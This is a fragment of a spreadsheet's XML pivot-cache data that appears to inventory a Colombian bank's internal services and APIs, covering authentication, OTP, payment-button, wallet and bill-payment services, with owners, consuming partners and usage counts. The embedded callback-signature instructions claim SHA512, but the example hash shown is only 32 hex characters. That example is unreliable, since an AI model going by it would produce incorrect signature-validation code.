    <s v="AW01065 _x000d__x000a_APIC _x000d__x000a_NU0017001 _x000d__x000a_AW0638 _x000d__x000a_AW1269001 _x000d__x000a_AW1170 _x000d__x000a_AFC _x000d__x000a_NU0004001 _x000d__x000a_AW1078001 _x000d__x000a_AW1300001 _x000d__x000a_AW1311 _x000d__x000a_AW1365 _x000d__x000a_AW1298001 _x000d__x000a_AW1011 _x000d__x000a_AW0638001 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectaciones Monetarias Tarjetas Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Afectaciones Monetarias Tarjetas Crédito permite realizar, como su nombre lo indica, diferentes afectaciones monetarias sobre una tarjeta de crédito. Tales afectaciones incluyen:  • Pagar tarjeta de crédito con débito a cuenta • Pagar tarjeta de crédito de terceros • Pagar tarjeta de crédito con cuentas de otros bancos"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1405001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Almacenar Solicitud De Credito_BB11"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite a los consumidores enviar a Gestión Documental información relacionada con el cliente que hace la solicitud de un crédito de consumo."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="BB11_Generación de Solicitudes_RequestGeneration_AW0935001"/>
    <s v="AW0499 _x000d__x000a_AW1176 _x000d__x000a_AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Anulacion Factura Recaudo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Anulación Factura Recaudo permitirá a los recaudadores hacer gestión sobre sus facturas _x000a__x000a_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Arquear Documentos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite realizar el arqueo (custodia) de Documentos en Gestión Documental, posterior al consumo del servicio BB7 correspondiente al Envío y Recepción de documentos."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Asignar Primera Segunda Clave SVP"/>
    <n v="300"/>
    <x v="0"/>
    <s v="Permitir que un cliente de Filiales del Exterior genere su primera o segunda clave única de cliente en la (SVP) Sucursal Virtual Personas para Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio habilita la autenticación de clientes Bancolombia del segmento personas que tengan un nombre de usuario registrado para cualquiera de los canales."/>
    <m/>
    <m/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1128 _x000d__x000a_NU0051001 _x000d__x000a_AW1291001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Cliente DIAN"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio está orientada a la habilitación de la interoperabilidad con los sistemas Muisca de la DIAN. Describe los mecanismos y requerimientos para que un sistema externo (aplicación) pueda obtener un token de acceso para el consumo de servicios de la entidad."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Gobierno e Impuestos"/>
    <m/>
    <m/>
    <s v="DIAN"/>
    <s v="AW01065"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Oauth"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El Componente de Integración Autenticación Oauth, comprende la especificación de implementación requerida para el procesamiento de los consumos realizados por parte del servicio de Oauth 2.0, con el objetivo de realizar el proceso de autenticación de los clientes que hacen uso de las APIs expuestas por el Banco a través de API Connect.  Este componente hace uso de la capacidad entregada en el iSeries encargado de realizar la generación / validación de PINES. Dicha Capacidad se encuentra virtual izada en Broker. Una vez validado el OTP se recupera información básica del cliente como el Nombre y Apellido relacionados al OTP."/>
    <m/>
    <m/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Giros Nacionales_AW1227001"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Sufi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio AutenticacionSufi permitirá a los consumidores autenticar a un usuario registrado en sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="AW1209001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Cliente OTP"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW0748001 _x000d__x000a_AW1170 _x000d__x000a_AW1287001 _x000d__x000a_NU0101001 _x000d__x000a_NU0004001 _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_AW1011 _x000d__x000a_AW1185001 _x000d__x000a_NU0100001 _x000d__x000a_AW1316001 _x000d__x000a_AW1277001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0199001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Cliente OTP"/>
    <n v="110"/>
    <x v="0"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID_x005f_x000D_ "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW0638"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Cliente OTP"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID.  El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="NU0100001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Compra VCAS"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio se encargara de realizar la autenticación para la compra en comercios seguros directamente con Cardinal. identificando al cliente, y usando el segundo factor de autenticación según convenga_x000a_"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="NU0101001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Usuario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio se encarga de autenticar usuarios por medio de su documento de identificación y su PIN (primera clave), actualmente es utilizado por Ventas por Internet (Todo1)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="VENTAS POR INTERNET_SECURITY SESSION MANAGER (SSM)_AW1013001"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Usuario"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio se encarga de autenticar usuarios por medio de su documento de identificación y su PIN (primera clave), actualmente es utilizado por Ventas por Internet (Todo1)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="VENTAS POR INTERNET_SECURITY SESSION MANAGER (SSM)_AW1013001"/>
    <s v="AW1177 _x000d__x000a_AW1170 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-07-25T15:10:35"/>
    <s v="Authorization"/>
    <n v="111"/>
    <s v="Authorization - Access Authorization"/>
    <n v="110"/>
    <x v="17"/>
    <s v="API que permite obtener el token de autorización para el consumo de APIs píºblicas y partner aseguradas con OAuth2.0"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="pruebaBancolmbiaButton _x000d__x000a_ PruebasIntegración _x000d__x000a_ APP D Y S _x000d__x000a_ FACTURE PAY _x000d__x000a_ ALCALDIA DE MANIZALES _x000d__x000a_ TRANSFIRIENDO _x000d__x000a_ BANCOLOMBIAPAY APP _x000d__x000a_ Moneygram_MNR _x000d__x000a_ Botón _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <n v="10"/>
    <m/>
    <n v="13"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Authorization Services"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Componente encargado de la autenticación de los clientes, haciendo uso de flujo OAuth Resource Owner Password Credentials, también permite el enrolamiento y autenticación con factor biométrico local. Para todos los casos se genera un token de acceso con el cual se controla la sesión del canal y la autorización en Security Filters a los recursos. Adicionalmente se expone la capacidad de validación de token de acceso vía instrospección."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="13"/>
    <s v="Productor Transversal"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="ALM"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-28T03:51:33"/>
    <s v="Bancolombia Button"/>
    <n v="102"/>
    <s v="Bancolombia Button - Transference Management"/>
    <n v="102"/>
    <x v="18"/>
    <s v="Este servicio permite que un comercio pueda registrar una intención de compra, para pagar a través de Botón Bancolombia, obteniendo como resultado un identificador de dicha intención. Después de registrar la intención de compra, el comercio podrá consultar el estado de la transferencia con el identificador que se retornó en el primer momento. "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Boton de Transferencias_AW1277001"/>
    <s v="WOMPI _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-28T14:26:14"/>
    <s v="Bancolombia Button"/>
    <n v="202"/>
    <s v="Bancolombia Button - Transference Management"/>
    <n v="202"/>
    <x v="18"/>
    <s v="Capacidades funcionales que tienen como objetivo apoyar un nuevo medio de pago virtual denominado Botón de Transferencias Bancolombia"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Boton de Transferencias_AW1277001"/>
    <s v="TIGOUNE _x000d__x000a_ Tuya _x000d__x000a_ Tigo une prueba APP _x000d__x000a_ VIRGINMOBILEAPP _x000d__x000a_ Baguer SAS _x000d__x000a_ SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000d__x000a_ OPERACIONES GENERALES SURAMERICANA SAS _x000d__x000a_ SERVICIOS GENERALES SURAMERICANA S.A.S. _x000d__x000a_ CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000d__x000a_ SEGUROS GENERALES SURAMERICANA SA _x000d__x000a_ SEGUROS DE VIDA SURAMERICANA SA _x000d__x000a_ EPS SURAMERICANA S.A. _x000d__x000a_ FONYOU COLOMBIA SAS _x000d__x000a_ INVERSORA EBCO APP _x000d__x000a_ ABC PAGOS _x000d__x000a_ LYRAAPP _x000d__x000a_ CLAROAPP _x000d__x000a_ SUPERPAGOSAPP _x000d__x000a_ ZONA PAGOS _x000d__x000a_ Place to Pay _x000d__x000a_ T atiendo Boton Bancolombia _x000d__x000a_ Boton Bancolombia _x000d__x000a_ E-collect _x000d__x000a_ App_Blendex_BotonBancolombia _x000d__x000a_ ofrendaappbc _x000d__x000a_ ALKOSTO BOTON BANCOLOMBIA _x000d__x000a_ WOMPI APP _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ COMFAMA APP _x000d__x000a_ SISTECREDITO SAS _x000d__x000a_ PAYMENTEZ APP _x000d__x000a_ FONVALMED"/>
    <n v="939414"/>
    <n v="768053"/>
    <n v="2040383"/>
    <n v="4058637"/>
    <n v="8844910"/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-22T18:05:17"/>
    <s v="Bancolombia Button"/>
    <n v="302"/>
    <s v="Bancolombia Button - Transference Management"/>
    <n v="302"/>
    <x v="18"/>
    <s v="Botón Bancolombia ofrece varias funcionalidades que permiten a los comercios procesar transacciones y conocer su estado en lí­nea **Funcionalidades** - Realizar transferencias entre cuentas de ahorro y corriente Bancolombia para ventas digitales. - Hacer consultas del estado de las transacciones. **Datos de prueba** Para realizar pruebas del producto de APIs de Botón Bancolombia puede utilizar los datos que se encuentran en el siguiente archivo: [Datos de prueba](https://cocapis.s3.us-east-2.amazonaws.com/assets/imagenes+familias/BC-OBA-CP-BancolombiaButton+v1.4.4.xlsx) **Callback** Funcionalidad que nos permite notificarle al comercio o a la pasarela de pago el resultado final de la transacción. Para habilitar esta opción, es necesario enviar la URL de notificación en el campo 'confirmationURL' de la operación POST 'registry', en caso de no enviarla, no se llevará a cabo. **Importante:** Todos los campos se enví­an como **String** pero se respeta el tipo de dato que se muestra a continuación: **Campos que se enví­an en el Callback** / **Campo** / **Tipo** / **Longitud máxima** / **Descripción** / / --- / --- / --- / --- / / transferVoucher / String / 50 / Níºmero de comprobante de la transacción. / / transferAmount / Double / 15 / Monto de la transacción / / transferStateDescription / String / 225 / Descripción del resultado de la transacción / / sign / String / 128 / Firma que permitirá validar la integridad del request generado por Bancolombia / / requestDate / DateTime / 23 / Fecha en la que se registró la orden / / transferState / String / 20 / Estado de la transacción / / transferDate / Date / 20 / Fecha en la que se aprobó o rechazó la transacción. / / transferCode / String / 50 / Identificador íºnico de la transferencia / / transferReference / String / 48 / Código de referencia de la transacción para el comercio. / / commerceTransferButtonId / String / 50 / HASH que identifica el Botón Bancolombia del comercio / **Â¿Cómo generar el sign?** Para generar este valor, debe concatenar los siguientes valores: [apiKey~commerceTransferButtonId~transferCode~tranferAmount~transferState] Una vez concatenados debe cifrar utilizando el algoritmo SHA512. Por ejemplo, al concatenar los datos mencionados debe obtener algo muy similar a esto: 5Fj8eK4rlyUd252L48herdrnEO~w0mp1B0toN~\_CeoHUM7C65~200.00~rejected Y al crear el HASH de la cadena resultante, debe obtener el sign como se muestra a continuación: b6f7bc914b69824df799db0ad7c9bb26 [Bancolombia API Working Group - Website](https://developer.bancolombia.com/contact) [Send email to Bancolombia API Working Group](mailto:apigroup@bancolombia.com.co)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <m/>
    <m/>
    <s v="pruebaBancolmbiaButton _x000d__x000a_ PruebasIntegración _x000d__x000a_ APP D Y S _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ FACTURE PAY _x000d__x000a_ ALCALDIA DE MANIZALES _x000d__x000a_ TRANSFIRIENDO _x000d__x000a_ Botón"/>
    <n v="6173"/>
    <n v="6520"/>
    <n v="2679"/>
    <n v="3226"/>
    <n v="1719"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Customer"/>
    <n v="100"/>
    <x v="19"/>
    <s v="Esta API cuenta con capacidades que permiten verificar la viabilidad de una persona, autenticándola mediante un token de OTP y enviarle los términos y condiciones para que este los acepte y pueda acceder a los servicios de BancolombiaPay."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="14"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <n v="144"/>
    <n v="8"/>
    <n v="125"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - OTP"/>
    <n v="100"/>
    <x v="20"/>
    <s v="Permite Validar el codigo de unico uso que se envia al cliente como segundo valor de autenticacion."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="14"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="18"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Terms"/>
    <n v="100"/>
    <x v="21"/>
    <s v="Permite desplegar los terminos y condiciones que fueron acordados entre el aliado y Bancolombia."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="14"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <n v="2"/>
    <m/>
    <n v="35"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Wallet"/>
    <n v="100"/>
    <x v="22"/>
    <s v="Esta API permite gestionar la información asociada a la billetera que hace parte del servicio de BancolombiaPay."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="14"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="25"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Wallet Balance"/>
    <n v="100"/>
    <x v="23"/>
    <s v="API que permite consultar el saldo de una cuenta."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="14"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Wallet Payment"/>
    <n v="100"/>
    <x v="24"/>
    <s v="Esta API permite a los clientes realizar el pago de productos o servicios desde una canal de un tercero."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="14"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-02T15:25:05"/>
    <s v="Bank Account"/>
    <n v="100"/>
    <s v="Bank Account - Accounts Opening"/>
    <n v="100"/>
    <x v="25"/>
    <s v="Permite realizar la apertura de cuentas de ahorro o corriente para clientes ya vinculados con el Banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="50"/>
    <n v="36796"/>
    <n v="35561"/>
    <n v="27151"/>
    <n v="46125"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-06-10T11:11:52"/>
    <s v="Bank Account"/>
    <n v="100"/>
    <s v="Bank Account - Plan Changing"/>
    <n v="100"/>
    <x v="26"/>
    <s v="Cambia el plan de una cuenta de ahorros, de acuerdo con la oferta comercial de planes de vigentes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="CambioPlanCuenta/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <n v="17"/>
    <n v="6"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-09-08T11:47:01"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payment - Management"/>
    <n v="120"/>
    <x v="27"/>
    <s v="El API Bill Payments - Management permitirá realizar gestión sobre sus facturas, podrá consultar las facturas, inscribirlas y/o actualizarlas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="1803"/>
    <n v="2137"/>
    <n v="2203"/>
    <n v="1251"/>
    <n v="165"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-11T16:38:51"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payment - Scheduled Information"/>
    <n v="100"/>
    <x v="28"/>
    <s v="La API Bill Payment - Scheduled Information permite consultar información sobre la programación de los pagos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <s v="ConsultaPagoProgramado/V1.0"/>
    <m/>
